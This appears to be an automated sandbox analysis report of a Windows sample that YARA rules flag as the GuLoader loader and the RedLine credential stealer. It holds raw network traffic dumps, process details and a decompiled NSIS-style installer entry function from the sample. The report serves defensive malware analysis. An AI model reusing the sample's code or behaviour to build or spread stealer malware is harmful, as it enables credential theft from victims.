                                                                                                                                                                        Data Raw: 3c b8 df aa d5 24 18 4b 00 7c 20 bc 99 ab 4c bd cb dd 92 5d fb 30 6b 55 fc 10 13 eb 85 8a bd f7 3e dc 6f 1d dc 42 51 7c d2 39 2d b7 bf 40 ab fa 75 9c b4 48 eb 92 39 1c 82 89 36 23 5e 56 75 77 33 18 04 85 68 69 41 92 39 b4 cb eb 5e 8c 12 df 3f ed 01 57 e9 f0 7c e9 90 c8 2b 3f 5f 69 32 39 2c 89 3c 73 4a 8b 19 e5 b6 fa ad 09 5a d5 5a 20 30 01 5f 10 89 1a f1 0d 65 b3 b7 3c 54 6f c7 f1 2b f1 2d 3a 29 5e b3 ee ca 06 74 9f 76 94 8c fd af a5 4c eb 39 0a 7b 43 b3 5b ea f3 4a da 5d 94 ac 92 9c 3d 76 be 67 9b cb c1 8a ab 1b 76 ca d8 da b7 9f 8a 47 87 a8 b5 10 83 a2 9c 41 f3 ac 3f d6 ef d6 5a f9 70 d8 b3 87 db 69 ec 39 48 f3 51 44 21 89 25 ca 24 f1 07 6c 95 b1 1f 8a 73 be 4e 01 c8 c6 30 2b 2f bf 8b 39 c8 4c 09 7c e3 8c ba d3 e7 d2 9b 28 27 2c 6d e8 44 5e bf a6 5a 92 ab ac d5 54 4f f7 a5 d1 7b 9f c1 6b 30 02 a1 19 48 39 da 2c df e1 bc 9c 27 23 4d 7b 71 5a 01 0d 72 69 ee 5d 25 c7 fd 75 f3 2d 1a f4 84 b9 8e 64 35 eb 74 eb 11 5e f2 74 52 c6 73 e9 45 30 a2 91 f8 a9 4c cc f1 1f f1 e0 a3 84 d1 aa bf 3d 02 f9 c7 ae 77 b2 86 d0 bc ab fd 9b d6 1e d7 2b 15 4b 5b a8 f4 8f 35 4d 07 67 7f 5f cc a6 42 91 d4 83 e6 38 43 98 ea 66 ca bc a1 f0 69 d1 f3 18 81 09 e3 3f ba 2c 41 8f 04 af 03 4c 2b 3d 9d a7 5c e6 d6 87 e7 f6 44 bd 04 40 28 d5 69 45 60 c3 80 00 2b 2d b0 35 a0 d6 50 a3 a2 b0 aa fc b1 65 5a aa 5f 92 77 07 22 71 fc 5d ea 08 c0 b2 58 e8 34 bf 16 51 ff ba ca dd 23 9e ba de 83 b8 1c 4c fd c3 1b f4 d0 b5 ad a3 09 d5 28 9a 8c 94 b6 75 e7 3f 7e 29 c6 a0 e3 6c 86 62 92 46 7d c8 f9 b0 a2 ad fb 2f ed b1 3a d6 e7 3a 18 35 f8 15 b7 45 b3 d8 ad 84 c0 d7 0d 27 57 8d 65 b0 71 75 5e 8d 80 82 4a a1 1e 77 c1 70 5e 62 43 1f 86 00 c7 19 3b d7 d0 70 07 b4 7b 88 29 c0 96 aa c9 4d 2c ee 30 4a 9f 52 ad 71 35 07 7f 2d c5 6d 02 a4 57 13 f9 5f 5a e5 4d 0c 70 f8 6e 5a 43 b0 84 94 f0 c5 1e b9 6b ef 07 0c 96 48 33 8d a1 56 d6 a8 2e 69 62 27 8c 76 8b 06 b0 63 8c b3 b3 72 04 a8 a8 a2 5a 80 61 d9 61 a7 5b 71 09 ba b4 92 88 0b 3d 6d 63 fc bb 22 96 39 c5 4f db fd c1 23 16 f4 80 0d 82 86 d0 01 25 03 f4 62 1c 5e ec 83 bf ea b9 14 88 40 d8 55 a3 5b 27 4e fb d5 39 34 e2 df db ea 24 85 0f 0c 2a ab 2d 9f a1 40 6e 30 41 8e 2d ce 90 74 cf d8 c7 04 dc a7 ba ac 7f 9e ab 70 5f c5 7e 01 a0 38 1e b1 fe f0 83 fc 95 cd 83 d9 69 c7 51 82 ce 1f 9f 9a ac 7b d2 fd db dd 84 a6 6b 2f 5f c3 65 15 27 4e 33 f3 58 d4 7b 14 5a 8a 2d d3 34 98 92 4f 6e 63 d0 80 c5 1c f1 c4 17 de 20 c0 08 6b ab 34 e4 c3 a6 7f 66 04 39 56 11 b2 e8 4c c7 bb ec fb 02 1c d1 87 28 59 b0 b8 2d fa 19 5d 30 7a 2a 66 ad c2 54 98 76 73 c5 48 09 88 92 23 a6 8b 62 da db 4d 86 5f 7e 42 94 85 6b 69 41 92 3d b4 cb eb a1 73 12 df 87 ed 01 57 e9 f0 7c e9 d0 c8 2b 3f 5f 69 32 39 2c 89 3c 73 4a 8b 19 e5 b6 fa ad 09 5a d5 5a 20 30 01 5f 10 89 1a f1 0d 65 b3 b7 3c b4 6f c7 f1 25 ee 97 34 29 ea ba 23 eb be 75 d3 bb b5 d8 95 c6 d6 6c 9b 4b 65 1c 31 d2 36 ca 90 2b b4 33 fb d8 b2 fe 58 56 cc 12 f5 eb a8 e4 8b 5f 39 99 f8 b7 d8 fb ef 69 8a a5 bf 34 83 a2 9c 41 f3 ac 3f be ff 52 77 d5 01 32 cd ab aa 83 92 15 39 19 2f 76 02 f6 5b f5 55 1b 79 67 22 20 61 a1 02 54 30 2d b9 2d 4e 77 5e 55 f5 0b eb 22 77 60 92 66 c4 e1 c4 bb e5 8a 56 c6 13 da 67 25 c1 8b 2b 78 d5 fe bc 37 27 db d4 3b 05 9f c1 6b 30 02 a1 19 48 39 da 2c df e1 bc 9c 27 d5 e8 52 e1 5a 01 0d 72 39 ab 5d 25 8b fc 71 f3 59 bf f4 d4 b9 8e 64 35 eb 74 eb 11 be f2 57 53 cd 72 e0 ce 74 1e 94 d5 a7 06
                                                                                                                                                                        Data Ascii: <$K| L]0kU>oBQ|9-@uH96#^Vuw3hiA9^?W|+?_i29,<sJZZ 0_e<To+-:)^tvL9{C[J]=vgvGA?Zpi9HQD!%$lsN0+/9L|(',mD^ZTO{k0H9,'#M{qZri]%u-d5t^tRsE0L=w+K[5Mg_B8Cfi?,AL+=\D@(iE`+-5PeZ_w"q]X4Q#L(u?~)lbF}/::5E'Wequ^Jwp^bC;p{)M,0JRq5-mW_ZMpnZCkH3V.ib'vcrZaa[q=mc"9O#%b^@U['N94$*-@n0A-tp_~8iQ{k/_e'N3X{Z-4Onc k4f9VL(Y-]0z*fTvsH#bM_~BkiA=sW|+?_i29,<sJZZ 0_e<o%4)#ulKe16+3XV_9i4A?Rw29/v[Uyg" aT0--Nw^U"w`fVg%+x7';k0H9,'RZr9]%qYd5tWSrt
                                                                                                                                                                        Dec 18, 2021 08:26:53.418976068 CET10480INData Raw: ca 71 e8 29 8a a3 b0 dc c0 bf be f2 ff c2 b9 c7 b3 46 ba bd bb 02 8e c6 ae 96 2b db 87 97 61 38 43 f9 81 cb ab b3 96 00 6a bd 84 d0 33 a7 38 f6 5b 94 6c eb 43 5e 0b 52 de f3 1a 86 89 33 d7 0c c3 be 70 d8 63 cf 80 e7 e1 16 eb 68 e2 e4 47 a6 4c 4c
                                                                                                                                                                        Data Ascii: q)F+a8Cj38[lC^R3pchGLL@~X Eou$/e4f0TUm7@*4?oV"a_K2J/IqFaTp"N)1/oA|a6wH<zjL2emh?4Y;xbja@q#
                                                                                                                                                                        Dec 18, 2021 08:26:53.419059992 CET10482INData Raw: 5f f8 b0 e7 0e f2 3a ed ea 8c b5 34 44 35 1d 2d 5b f8 e5 26 76 ef 27 72 b9 1f 77 79 14 59 0a 83 e7 f7 6f 69 9f cc d3 61 41 69 24 38 e9 fb d8 b2 75 1c 72 c0 44 7e 9f 8c fc de 0f 6f 71 a6 2d d8 fb 6c ad 86 26 42 35 f6 82 93 f7 fd a3 89 29 df 52 75
                                                                                                                                                                        Data Ascii: _:4D5-[&v'rwyYoiaAi$8urD~oq-l&B5)RuS1D$. gpSc$_x"w`YpOf*x?^?$^/[p9`ebX'^'i]$r4]^q`=V/:{/V+}=o%6.J&M9#B
                                                                                                                                                                        Dec 18, 2021 08:26:53.419112921 CET10483INData Raw: 1d 19 94 19 9f ce 0a 3c c9 48 0e 84 19 19 e5 64 1e 8f 87 ca 09 ff 8e b2 8b fc f5 e3 1a e3 9e 9f 07 58 ef 54 6b 5d b8 45 84 0d f7 77 ba d4 b5 93 53 89 a7 ee dd 4f 0d a6 f6 f7 08 61 53 84 82 15 04 43 84 a6 e8 eb 53 fe c5 a7 66 4e 3c 77 e5 dd 7b 14
                                                                                                                                                                        Data Ascii: <HdXTk]EwSOaSCSfN<w{icu%f}|P3"Sf"[9V5LM~vt^M|kpl`Tg@iPEnm/X(o.}gjp}ETl!3r+(P|gH
                                                                                                                                                                        Dec 18, 2021 08:26:53.419171095 CET10484INData Raw: 28 72 1e 0c b6 75 6c 73 5a 65 45 64 e7 3d d1 eb d6 c2 30 35 ec d0 12 ec fb a4 91 95 02 86 6a 6c 1c 67 c5 90 93 59 b2 d8 ad d4 97 3f 76 ab 57 8d ee fc 55 25 0f de d6 6a 75 3b 1e 77 4c e4 7a 72 42 31 f2 37 32 29 1f e7 80 eb 57 bb bd cc 1d f4 58 6c
                                                                                                                                                                        Data Ascii: (rulsZeEd=05jlgY?vWU%ju;wLzrB172)WXlhd1q#H7)&{,5! 6)-(aihnjM]qJ2FHF%=S5T/xdkg2tYY4K0Pg!jPzkHdT8^
                                                                                                                                                                        Dec 18, 2021 08:26:53.419210911 CET10486INData Raw: 11 1a 37 1e 37 8f e7 18 16 66 81 ef 5c 1a ac ef 1c 50 33 26 ec 55 b7 0b 71 f1 e0 1b 26 72 79 aa 86 aa 3e 0d 25 46 8e 64 47 ed f5 02 e0 41 f2 57 eb bc f2 e7 c5 c7 dd 51 12 a6 8d 0f 30 ff f5 cb 61 a8 db f4 7e dd 02 a6 cc 6f 9c 70 07 2b 0c fe fd 9b
                                                                                                                                                                        Data Ascii: 77f\P3&Uq&ry>%FdGAWQ0a~op+5+K]k2KIzBsfCc8><C;mCPGg~jc}L_t!K[";@VC,(1@uMLic~m("Ys3:"H9N;K
                                                                                                                                                                        Dec 18, 2021 08:26:53.419275999 CET10487INData Raw: 10 b2 16 d2 68 9a 4d a3 a0 7e 42 94 b6 7f ec f1 2c 7c b4 f8 ba 5d f8 d0 1e 6f fd 24 a8 e9 f0 7c 62 0a 43 2f ba ef df 73 39 ed 62 34 f2 a9 74 19 e5 b6 c9 a9 94 ea 6f 1b 20 bb db 9e fb 91 29 f5 90 d5 01 f6 3c 35 8d 38 f1 25 ee a4 30 bc 5a 04 62 eb
                                                                                                                                                                        Data Ascii: hM~B,|]o$|bC/s9b4to )<58%0Zb=$K!VuL|)t_9EKU(.ghUnw2/3,T9V1~wa4w4f&U0/eL79+;oXH5-dYa*k(QA_G
                                                                                                                                                                        Dec 18, 2021 08:26:53.419326067 CET10489INData Raw: 47 7e 0c 61 19 51 4f 29 8e d6 47 39 0e ba 87 3d 6d 69 73 ff 06 9a d1 a7 b0 24 02 4a a7 32 e4 81 4d 82 b5 ef c4 50 fd 22 25 1c 5e ec bf f0 a6 85 18 db b4 55 01 41 57 a2 87 af c5 b2 cb 14 1e da 9e 26 b6 3d dd c3 28 ef db 24 89 5b c0 c8 3a 11 42 90
                                                                                                                                                                        Data Ascii: G~aQO)G9=mis$J2MP"%^UAW&=($[:Bt[]X:YZ8G=UMKQ_p,-l7v[YmitRLkN2[9V{\1z/Vr3lj.PH_eZNEfIph"{8+A
                                                                                                                                                                        Dec 18, 2021 08:26:53.419363022 CET10490INData Raw: c1 51 83 13 99 2e 79 a8 89 c5 63 a0 60 42 ea 98 58 c0 be d4 d4 63 8c 74 6d f3 eb b8 0c 4b fc 50 60 20 b7 17 0f eb 31 84 c1 2c 28 f3 1b b9 ff 08 db ab cb 93 f8 c0 b4 f3 b7 82 83 34 95 3a c6 b0 fe a1 2b f5 67 ce 28 f7 64 87 3c 86 6d 3e d6 f6 46 eb
                                                                                                                                                                        Data Ascii: Q.yc`BXctmKP` 1,(4:+g(d<m>Fpi:lo64<G6Kw^i]"p^`>8q?9Y(5mAka_O;+W"Sb2+Z#`un;u;LaHOM$!])l&s~?$~/
                                                                                                                                                                        Dec 18, 2021 08:26:53.419434071 CET10491INData Raw: 15 ba dd 23 fd c5 1e 85 0d aa e4 fa 18 32 20 6e 25 f0 aa cf d2 3a d6 4a 78 db a5 0b f4 14 a9 31 78 17 a6 bb e6 4f 7e b8 d1 09 98 d0 59 9f 27 ce 0e aa 78 d5 fe 37 61 33 51 93 0b 8e d1 c9 e3 34 13 a0 77 5c 36 6c 7b ee 6a fa 88 ac 9b e0 da f5 52 00
                                                                                                                                                                        Data Ascii: #2 n%:Jx1xO~Y'x7a3Q4w\6l{jRcf6ex|!"5CzhQ8;("5q[v#%OB?As.V7*EZ[gw3&$bXCQR=q<F3eIq*q`x/?@
                                                                                                                                                                        Dec 18, 2021 08:26:53.474041939 CET10493INData Raw: e4 3a d1 c1 87 26 eb b1 54 54 79 c1 49 29 91 2e 91 f9 2c 26 67 45 7b 6c 0b c7 d9 c6 9e ba ad b9 38 06 a4 af a2 00 b1 f9 6f c0 03 28 2f f0 73 67 ec 80 6e 82 03 65 4f 11 08 c9 d0 19 bc fe 6f 50 82 4c c7 1d 44 58 e1 81 50 a7 33 26 b6 65 e0 3d 20 b1
                                                                                                                                                                        Data Ascii: :&TTyI).,&gE{l8o(/sgneOoPLDXP3&e= :d~/7U%d=-L5oRN|DzZQg/F!p(hQ]9)'4AUuhx=9'd(pM/c!RwG!E8l]4Wzk qXTJ3Z6


                                                                                                                                                                        Code Manipulations

                                                                                                                                                                        Statistics

                                                                                                                                                                        CPU Usage

                                                                                                                                                                        Click to jump to process

                                                                                                                                                                        Memory Usage

                                                                                                                                                                        Click to jump to process

                                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                        Behavior

                                                                                                                                                                        Click to jump to process

                                                                                                                                                                        System Behavior

                                                                                                                                                                        Analysis Process: GR8jRQeRUr.exe PID: 6416 Parent PID: 2932

                                                                                                                                                                        General

                                                                                                                                                                        Start time:08:24:56
                                                                                                                                                                        Start date:18/12/2021
                                                                                                                                                                        Path:C:\Users\user\Desktop\GR8jRQeRUr.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\GR8jRQeRUr.exe"
                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                        File size:96104 bytes
                                                                                                                                                                        MD5 hash:30A35B83C44ABA13EE4EA4EE11003419
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Yara matches:
                                                                                                                                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.405583590.0000000002940000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                        Reputation:low

                                                                                                                                                                        Chronological Activities

                                                                                                                                                                        Analysis Process: GR8jRQeRUr.exe PID: 6312 Parent PID: 6416

                                                                                                                                                                        General

                                                                                                                                                                        Start time:08:25:56
                                                                                                                                                                        Start date:18/12/2021
                                                                                                                                                                        Path:C:\Users\user\Desktop\GR8jRQeRUr.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\GR8jRQeRUr.exe"
                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                        File size:96104 bytes
                                                                                                                                                                        MD5 hash:30A35B83C44ABA13EE4EA4EE11003419
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                                                                                        Yara matches:
                                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000F.00000002.590456261.000000001E680000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000F.00000002.591527825.000000001F6D7000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000F.00000003.523823007.000000000098B000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000F.00000002.590191064.000000001E490000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000F.00000000.404230350.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000F.00000002.589866449.000000001E1D0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.591069977.000000001E985000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                        Reputation:low

                                                                                                                                                                        Chronological Activities

                                                                                                                                                                        Disassembly

                                                                                                                                                                        Code Analysis

                                                                                                                                                                        Reset < >

                                                                                                                                                                          Analysis Process: GR8jRQeRUr.exe PID: 6416 Parent PID: 2932 GR8jRQeRUr.exeCOMMON

                                                                                                                                                                          Executed Functions

                                                                                                                                                                          Function 0040352D, Relevance: 84.4, APIs: 33, Strings: 15, Instructions: 450stringfilecomCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 79%
                                                                                                                                                                          			_entry_() {
				WCHAR* _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				int _v24;
				int _v28;
				struct _TOKEN_PRIVILEGES _v40;
				signed char _v42;
				int _v44;
				signed int _v48;
				intOrPtr _v278;
				signed short _v310;
				struct _OSVERSIONINFOW _v324;
				struct _SHFILEINFOW _v1016;
				intOrPtr* _t88;
				WCHAR* _t92;
				char* _t94;
				void _t97;
				void* _t116;
				WCHAR* _t118;
				signed int _t120;
				intOrPtr* _t124;
				void* _t138;
				void* _t144;
				void* _t149;
				void* _t153;
				void* _t158;
				signed int _t168;
				void* _t171;
				void* _t176;
				intOrPtr _t178;
				intOrPtr _t179;
				intOrPtr* _t180;
				int _t189;
				void* _t190;
				void* _t199;
				signed int _t205;
				signed int _t210;
				signed int _t215;
				signed int _t217;
				int* _t219;
				signed int _t227;
				signed int _t230;
				CHAR* _t232;
				char* _t233;
				signed int _t234;
				WCHAR* _t235;
				void* _t251;

				_t217 = 0x20;
				_t189 = 0;
				_v24 = 0;
				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
				_v20 = 0;
				SetErrorMode(0x8001); // executed
				_v324.szCSDVersion = 0;
				_v48 = 0;
				_v44 = 0;
				_v324.dwOSVersionInfoSize = 0x11c;
				if(GetVersionExW( &_v324) == 0) {
					_v324.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v324);
					asm("sbb eax, eax");
					_v42 = 4;
					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
				}
				if(_v324.dwMajorVersion < 0xa) {
					_v310 = _v310 & 0x00000000;
				}
				 *0x434fb8 = _v324.dwBuildNumber;
				 *0x434fbc = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
				if( *0x434fbe != 0x600) {
					_t180 = E0040690A(_t189);
					if(_t180 != _t189) {
						 *_t180(0xc00);
					}
				}
				_t232 = "UXTHEME";
				do {
					E0040689A(_t232); // executed
					_t232 =  &(_t232[lstrlenA(_t232) + 1]);
				} while ( *_t232 != 0);
				E0040690A(0xb);
				 *0x434f04 = E0040690A(9);
				_t88 = E0040690A(7);
				if(_t88 != _t189) {
					_t88 =  *_t88(0x1e);
					if(_t88 != 0) {
						 *0x434fbc =  *0x434fbc | 0x00000080;
					}
				}
				__imp__#17();
				__imp__OleInitialize(_t189); // executed
				 *0x434fc0 = _t88;
				SHGetFileInfoW(0x42b228, _t189,  &_v1016, 0x2b4, _t189); // executed
				E0040653D(0x433f00, L"NSIS Error");
				_t92 = GetCommandLineW();
				_t233 = L"\"C:\\Users\\hardz\\Desktop\\GR8jRQeRUr.exe\" ";
				E0040653D(_t233, _t92);
				_t94 = _t233;
				_t234 = 0x22;
				 *0x434f00 = 0x400000;
				_t251 = L"\"C:\\Users\\hardz\\Desktop\\GR8jRQeRUr.exe\" " - _t234; // 0x22
				if(_t251 == 0) {
					_t217 = _t234;
					_t94 =  &M00440002;
				}
				_t199 = CharNextW(E00405E39(_t94, _t217));
				_v16 = _t199;
				while(1) {
					_t97 =  *_t199;
					_t252 = _t97 - _t189;
					if(_t97 == _t189) {
						break;
					}
					_t210 = 0x20;
					__eflags = _t97 - _t210;
					if(_t97 != _t210) {
						L17:
						__eflags =  *_t199 - _t234;
						_v12 = _t210;
						if( *_t199 == _t234) {
							_v12 = _t234;
							_t199 = _t199 + 2;
							__eflags = _t199;
						}
						__eflags =  *_t199 - 0x2f;
						if( *_t199 != 0x2f) {
							L32:
							_t199 = E00405E39(_t199, _v12);
							__eflags =  *_t199 - _t234;
							if(__eflags == 0) {
								_t199 = _t199 + 2;
								__eflags = _t199;
							}
							continue;
						} else {
							_t199 = _t199 + 2;
							__eflags =  *_t199 - 0x53;
							if( *_t199 != 0x53) {
								L24:
								asm("cdq");
								asm("cdq");
								_t215 = L"NCRC" & 0x0000ffff;
								asm("cdq");
								_t227 = ( *0x40a2c2 & 0x0000ffff) << 0x00000010 |  *0x40a2c0 & 0x0000ffff | _t215;
								__eflags =  *_t199 - (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t215);
								if( *_t199 != (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t215)) {
									L29:
									asm("cdq");
									asm("cdq");
									_t210 = L" /D=" & 0x0000ffff;
									asm("cdq");
									_t230 = ( *0x40a2b6 & 0x0000ffff) << 0x00000010 |  *0x40a2b4 & 0x0000ffff | _t210;
									__eflags =  *(_t199 - 4) - (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t210);
									if( *(_t199 - 4) != (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t210)) {
										L31:
										_t234 = 0x22;
										goto L32;
									}
									__eflags =  *_t199 - _t230;
									if( *_t199 == _t230) {
										 *(_t199 - 4) = _t189;
										__eflags = _t199;
										E0040653D(L"C:\\Users\\hardz\\AppData\\Local\\Temp", _t199);
										L37:
										_t235 = L"C:\\Users\\hardz\\AppData\\Local\\Temp\\";
										GetTempPathW(0x400, _t235);
										_t116 = E004034FC(_t199, _t252);
										_t253 = _t116;
										if(_t116 != 0) {
											L40:
											DeleteFileW(L"1033"); // executed
											_t118 = E0040307D(_t255, _v20); // executed
											_v8 = _t118;
											if(_t118 != _t189) {
												L68:
												E00403B12();
												__imp__OleUninitialize();
												if(_v8 == _t189) {
													if( *0x434f94 == _t189) {
														L77:
														_t120 =  *0x434fac;
														if(_t120 != 0xffffffff) {
															_v24 = _t120;
														}
														ExitProcess(_v24);
													}
													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
														LookupPrivilegeValueW(_t189, L"SeShutdownPrivilege",  &(_v40.Privileges));
														_v40.PrivilegeCount = 1;
														_v28 = 2;
														AdjustTokenPrivileges(_v16, _t189,  &_v40, _t189, _t189, _t189);
													}
													_t124 = E0040690A(4);
													if(_t124 == _t189) {
														L75:
														if(ExitWindowsEx(2, 0x80040002) != 0) {
															goto L77;
														}
														goto L76;
													} else {
														_push(0x80040002);
														_push(0x25);
														_push(_t189);
														_push(_t189);
														_push(_t189);
														if( *_t124() == 0) {
															L76:
															E0040140B(9);
															goto L77;
														}
														goto L75;
													}
												}
												E00405B9D(_v8, 0x200010);
												ExitProcess(2);
											}
											if( *0x434f1c == _t189) {
												L51:
												 *0x434fac =  *0x434fac | 0xffffffff;
												_v24 = E00403BEC(_t265);
												goto L68;
											}
											_t219 = E00405E39(L"\"C:\\Users\\hardz\\Desktop\\GR8jRQeRUr.exe\" ", _t189);
											if(_t219 < L"\"C:\\Users\\hardz\\Desktop\\GR8jRQeRUr.exe\" ") {
												L48:
												_t264 = _t219 - L"\"C:\\Users\\hardz\\Desktop\\GR8jRQeRUr.exe\" ";
												_v8 = L"Error launching installer";
												if(_t219 < L"\"C:\\Users\\hardz\\Desktop\\GR8jRQeRUr.exe\" ") {
													_t190 = E00405B08(__eflags);
													lstrcatW(_t235, L"~nsu");
													__eflags = _t190;
													if(_t190 != 0) {
														lstrcatW(_t235, "A");
													}
													lstrcatW(_t235, L".tmp");
													_t138 = lstrcmpiW(_t235, 0x441800);
													__eflags = _t138;
													if(_t138 == 0) {
														L67:
														_t189 = 0;
														__eflags = 0;
														goto L68;
													} else {
														__eflags = _t190;
														_push(_t235);
														if(_t190 == 0) {
															E00405AEB();
														} else {
															E00405A6E();
														}
														SetCurrentDirectoryW(_t235);
														__eflags = L"C:\\Users\\hardz\\AppData\\Local\\Temp"; // 0x43
														if(__eflags == 0) {
															E0040653D(L"C:\\Users\\hardz\\AppData\\Local\\Temp", 0x441800);
														}
														E0040653D(0x436000, _v16);
														_t202 = "A" & 0x0000ffff;
														_t144 = ( *0x40a25a & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
														__eflags = _t144;
														_v12 = 0x1a;
														 *0x436800 = _t144;
														do {
															E0040657A(0, 0x42aa28, _t235, 0x42aa28,  *((intOrPtr*)( *0x434f10 + 0x120)));
															DeleteFileW(0x42aa28);
															__eflags = _v8;
															if(_v8 != 0) {
																_t149 = CopyFileW(L"C:\\Users\\hardz\\Desktop\\GR8jRQeRUr.exe", 0x42aa28, 1);
																__eflags = _t149;
																if(_t149 != 0) {
																	E004062FD(_t202, 0x42aa28, 0);
																	E0040657A(0, 0x42aa28, _t235, 0x42aa28,  *((intOrPtr*)( *0x434f10 + 0x124)));
																	_t153 = E00405B20(0x42aa28);
																	__eflags = _t153;
																	if(_t153 != 0) {
																		CloseHandle(_t153);
																		_v8 = 0;
																	}
																}
															}
															 *0x436800 =  *0x436800 + 1;
															_t61 =  &_v12;
															 *_t61 = _v12 - 1;
															__eflags =  *_t61;
														} while ( *_t61 != 0);
														E004062FD(_t202, _t235, 0);
														goto L67;
													}
												}
												 *_t219 = _t189;
												_t222 =  &(_t219[2]);
												_t158 = E00405F14(_t264,  &(_t219[2]));
												_t265 = _t158;
												if(_t158 == 0) {
													goto L68;
												}
												E0040653D(L"C:\\Users\\hardz\\AppData\\Local\\Temp", _t222);
												E0040653D(0x441000, _t222);
												_v8 = _t189;
												goto L51;
											}
											asm("cdq");
											asm("cdq");
											asm("cdq");
											_t205 = ( *0x40a27e & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
											_t168 = ( *0x40a282 & 0x0000ffff) << 0x00000010 |  *0x40a280 & 0x0000ffff | (_t210 << 0x00000020 |  *0x40a282 & 0x0000ffff) << 0x10;
											while( *_t219 != _t205 || _t219[1] != _t168) {
												_t219 = _t219;
												if(_t219 >= L"\"C:\\Users\\hardz\\Desktop\\GR8jRQeRUr.exe\" ") {
													continue;
												}
												break;
											}
											_t189 = 0;
											goto L48;
										}
										GetWindowsDirectoryW(_t235, 0x3fb);
										lstrcatW(_t235, L"\\Temp");
										_t171 = E004034FC(_t199, _t253);
										_t254 = _t171;
										if(_t171 != 0) {
											goto L40;
										}
										GetTempPathW(0x3fc, _t235);
										lstrcatW(_t235, L"Low");
										SetEnvironmentVariableW(L"TEMP", _t235);
										SetEnvironmentVariableW(L"TMP", _t235);
										_t176 = E004034FC(_t199, _t254);
										_t255 = _t176;
										if(_t176 == 0) {
											goto L68;
										}
										goto L40;
									}
									goto L31;
								}
								__eflags =  *((intOrPtr*)(_t199 + 4)) - _t227;
								if( *((intOrPtr*)(_t199 + 4)) != _t227) {
									goto L29;
								}
								_t178 =  *((intOrPtr*)(_t199 + 8));
								__eflags = _t178 - 0x20;
								if(_t178 == 0x20) {
									L28:
									_t36 =  &_v20;
									 *_t36 = _v20 | 0x00000004;
									__eflags =  *_t36;
									goto L29;
								}
								__eflags = _t178 - _t189;
								if(_t178 != _t189) {
									goto L29;
								}
								goto L28;
							}
							_t179 =  *((intOrPtr*)(_t199 + 2));
							__eflags = _t179 - _t210;
							if(_t179 == _t210) {
								L23:
								 *0x434fa0 = 1;
								goto L24;
							}
							__eflags = _t179 - _t189;
							if(_t179 != _t189) {
								goto L24;
							}
							goto L23;
						}
					} else {
						goto L16;
					}
					do {
						L16:
						_t199 = _t199 + 2;
						__eflags =  *_t199 - _t210;
					} while ( *_t199 == _t210);
					goto L17;
				}
				goto L37;
			}



















































                                                                                                                                                                          0x0040353b
                                                                                                                                                                          0x0040353c
                                                                                                                                                                          0x00403543
                                                                                                                                                                          0x00403546
                                                                                                                                                                          0x0040354d
                                                                                                                                                                          0x00403550
                                                                                                                                                                          0x00403563
                                                                                                                                                                          0x00403569
                                                                                                                                                                          0x0040356c
                                                                                                                                                                          0x0040356f
                                                                                                                                                                          0x0040357d
                                                                                                                                                                          0x00403585
                                                                                                                                                                          0x00403590
                                                                                                                                                                          0x004035a9
                                                                                                                                                                          0x004035ab
                                                                                                                                                                          0x004035b3
                                                                                                                                                                          0x004035b3
                                                                                                                                                                          0x004035be
                                                                                                                                                                          0x004035c0
                                                                                                                                                                          0x004035c0
                                                                                                                                                                          0x004035d5
                                                                                                                                                                          0x004035fa
                                                                                                                                                                          0x00403608
                                                                                                                                                                          0x0040360b
                                                                                                                                                                          0x00403612
                                                                                                                                                                          0x00403619
                                                                                                                                                                          0x00403619
                                                                                                                                                                          0x00403612
                                                                                                                                                                          0x0040361b
                                                                                                                                                                          0x00403620
                                                                                                                                                                          0x00403621
                                                                                                                                                                          0x0040362d
                                                                                                                                                                          0x00403631
                                                                                                                                                                          0x00403638
                                                                                                                                                                          0x00403646
                                                                                                                                                                          0x0040364b
                                                                                                                                                                          0x00403652
                                                                                                                                                                          0x00403656
